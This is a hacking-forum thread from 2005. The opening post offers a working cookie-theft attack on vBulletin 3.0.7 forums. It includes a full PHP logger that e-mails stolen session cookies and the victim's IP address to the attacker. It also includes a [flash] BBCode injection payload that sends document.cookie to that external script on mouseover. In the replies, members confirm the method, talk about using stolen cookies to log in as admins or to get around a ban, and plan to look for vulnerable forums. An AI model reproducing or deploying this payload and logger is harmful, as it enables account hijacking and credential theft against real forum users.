ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Оффтоп > Forum for discussion of ANTICHAT
Перезагрузить страницу Vbulletin 3.0.7 -- Cookie
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Vbulletin 3.0.7 -- Cookie
  #1  
Старый 10.10.2005, 16:06
Аватар для néM3S!s
néM3S!s
Познающий
Регистрация: 07.09.2005
Сообщений: 31
Провел на форуме:
63022

Репутация: 26
По умолчанию Vbulletin 3.0.7 -- Cookie
Vbulletin 3.0.7 --> catch cookie (ie)
Only if the balise [flash] is used

Create a file log.php and insert the following code :

Код:
<?php
/* S4aLog v1.0 [ Beta ]
-----------------------
**Beta Of S4aLog v1.0 With Str_Repalce <;>
! You Can Get Cookies And Refresh The Broweser ! v0.10
[ New New New ]
!Named Your Attack With $nm e.x http://site/log?re=http://www.s4a.cc/&nm=Attack1&id=Cookies
[ MSG ]
Name : Attack1
Cookies : Cookies
Refresh : http://www.s4a.xx
[ MSG ]!
!
Get Cookies Like This :: bbpassword[000000] bbhash[0000] || Old bbpassword=12121; bbhash=12121;
!
[ New New New ]
*/
$YourMail = "devil-00@hotmail.co.uk";  // Your E-mail
/*-----------------------*/
$Ip = $REMOTE_ADDR;
$Cooki_e = $_GET['id'];
$NameOfAttack = $_GET['nm'];
$Refresh = $_GET['re'];
/* Start */
$ReplaceCookie1 = array("=",";");
$ReplaceCookie2 = array("[ "," ]  ");
$Cooki_e = str_replace($ReplaceCookie1,$ReplaceCookie2,$Cooki    _e); // Replace
/* e.x hash=0210; | hash[0210]*/
//***************************************//
$Hdr = "From: S4aLog <log-v1@s4a.cc>";
$Msg =
"
Mr Attacker ;) ,,, S4aLog v1 Beta <<
[ ".$NameOfAttack." ] ,, Name Of Attack
[ ".$Refresh." ] ,, Refresh Page
[ ".$Ip." ] ,, Ip
[ S4aLog < By Devil-00 > -- Thnx For -- <Yes2Hack> <xxx (hacker)> <s4a Members> ]
[ devil-00@hotmail.co.uk - devil.00@gmail.com ]
-----------------------------------------------
Cookie ::
".$Cooki_e."
";
/* ------------------------------------------------------------------------- */
$Send = mail($YourMail,"S4aLog -- NewLog",$Msg,$Hdr);
/**************************************************      ***************************/
if($Send){
if($Refresh <> ""){header("location:".$Refresh);}
}
?>
To add following a message that you post on the forum targets the following code :

Код:
[flash=http://www.site.com/flash.swf]onmouseover='location.href="http://www.site.com/log.php?nm=Black-code.net&re=http://www.linux-soul.net/vb/showthread.php?t=1245&id="+document.Cookie'[/flash]
Good work !
 
Ответить с цитированием

  #2  
Старый 11.10.2005, 00:08
Аватар для Дрэгги
Дрэгги
Moderator - Level 7
Регистрация: 26.08.2005
Сообщений: 457
Провел на форуме:
4007686

Репутация: 1442
По умолчанию
What is this all about? I'm really curious!
 
Ответить с цитированием

  #3  
Старый 11.10.2005, 00:42
Аватар для PEPSICOLA
PEPSICOLA
Познавший АНТИЧАТ
Регистрация: 14.10.2004
Сообщений: 1,162
Провел на форуме:
5619724

Репутация: 2944


По умолчанию
how i see... its a article (or something =)) how to steal cookies in vbulletin 3.0.7, but only if the balise [flash] is used... =)

and if flash is used, you just need post message (look néM3S!s post)... короче на снифер

and when your mouse over the flash - cookie will send to sniffer, right? =)
 
Ответить с цитированием

  #4  
Старый 11.10.2005, 12:48
Аватар для néM3S!s
néM3S!s
Познающий
Регистрация: 07.09.2005
Сообщений: 31
Провел на форуме:
63022

Репутация: 26
По умолчанию
yes it is exactly that
 
Ответить с цитированием

  #5  
Старый 12.10.2005, 04:52
Аватар для byte57
byte57
Постоянный
Регистрация: 22.01.2005
Сообщений: 764
Провел на форуме:
1086047

Репутация: 67


По умолчанию
respect, i'll try to find forums with flash, if somebody already did, give some links here plz.
 
Ответить с цитированием

  #6  
Старый 14.10.2005, 21:38
Аватар для Дрэгги
Дрэгги
Moderator - Level 7
Регистрация: 26.08.2005
Сообщений: 457
Провел на форуме:
4007686

Репутация: 1442
По умолчанию
And what's the use of stealing cookies? To be automatically logged in as another member (admin, for example) there, right?

I'm not sure this will help me to be back on that forum I was banned from though, because it's not vbulletin 3.0.7 it's 3.5.0 as well as I remember...
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Фальсификация cookie k00p3r Чужие Статьи 6 11.04.2010 19:36
Взлом через cookie k00p3r Чужие Статьи 0 13.06.2005 13:56
Есть ли возможность в vBulletin 3.0.7 восстановить по хешу пароль? dyx Форумы 4 21.05.2005 03:08



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ